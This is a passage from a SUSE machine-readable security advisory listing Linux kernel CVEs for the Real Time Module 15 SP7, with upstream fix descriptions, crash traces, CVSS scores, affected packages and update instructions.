"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
